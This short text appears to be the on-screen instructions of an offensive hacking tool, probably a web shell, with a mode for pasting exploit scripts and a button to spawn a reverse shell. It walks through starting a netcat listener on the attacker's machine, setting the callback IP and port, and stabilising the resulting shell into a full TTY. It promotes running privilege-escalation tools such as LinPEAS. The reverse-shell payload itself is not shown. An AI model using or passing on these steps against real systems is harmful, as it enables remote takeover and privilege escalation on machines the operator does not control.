📝 SCRIPT MODE - Paste multi-line commands or exploit scripts
Tip: Runs all commands in a single bash session
🚀 SPAWN REVERSE SHELL
Why you need this:
✓ Interactive exploits with menus (LinPEAS, privilege escalation tools)
✓ Tools that need persistent shell (sudo, su, interactive prompts)
✓ Full TTY for complex exploits
✓ Real terminal experience
STEP 1: Start listener on YOUR machine
nc -lvnp 15
STEP 2: Edit IP/PORT below, then click SPAWN
Choose Method:
STEP 3: Stabilize shell (after connection)
On YOUR machine (in the reverse shell):
1. Press CTRL+Z (backgrounds shell)
2. Type: stty raw -echo; fg
3. Press ENTER twice
4. Type: export TERM=xterm
5. Now you have full TTY - run your exploits!